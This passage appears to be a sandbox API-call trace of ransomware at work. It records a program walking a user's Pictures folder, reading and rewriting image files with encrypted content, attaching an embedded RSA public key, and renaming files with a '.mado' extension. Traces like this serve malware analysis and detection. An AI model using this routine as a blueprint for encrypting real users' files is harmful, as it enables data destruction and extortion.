lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.041] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.041] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.042] CloseHandle (hObject=0x63c) returned 1 [0206.043] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\rywMC5aBtOT7mD.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\rywmc5abtot7md.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\rywMC5aBtOT7mD.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\rywmc5abtot7md.png.mado")) returned 1 [0206.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.043] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.044] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabe3f050, ftCreationTime.dwHighDateTime=0x1d5e33d, ftLastAccessTime.dwLowDateTime=0x6b6a0470, ftLastAccessTime.dwHighDateTime=0x1d5df77, ftLastWriteTime.dwLowDateTime=0x6b6a0470, ftLastWriteTime.dwHighDateTime=0x1d5df77, nFileSizeHigh=0x0, nFileSizeLow=0x8b39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s9Sudl4JhdBUS2.jpg", cAlternateFileName="S9SUDL~1.JPG")) returned 1 [0206.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\s9Sudl4JhdBUS2.jpg") returned=".jpg" [0206.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\GVo5E\\s9Sudl4JhdBUS2.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\gvo5e\\s9sudl4jhdbus2.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.045] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=35641) returned 1 [0206.045] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.047] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8b13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.047] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.049] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8b39, lpOverlapped=0x0) returned 1 [0206.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.049] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.049] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0206.050] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.050] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.050] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.050] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.050] GetLastError () returned 0x0 [0206.050] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.050] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0206.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.050] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.050] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.051] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b40) returned 0x3b81690 [0206.051] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66d20 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66d68 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a10 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0206.051] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0206.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79a28 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b799f8 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72c98 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72db0 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.052] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.053] GetCurrentThreadId () returned 0x600 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff2c8 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.053] GetCurrentThreadId () returned 0x600 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0206.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0206.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a58 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a28 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a70 [0206.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a40 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79a88 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799f8 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a58 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a88 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799f8 | out: hHeap=0x2c0000) returned 1 [0206.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0206.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321af0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a40 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a70 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a28 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79a10 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66d68 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.057] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x8b34, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x8b34, lpOverlapped=0x0) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0206.057] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8b39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.057] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0206.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, 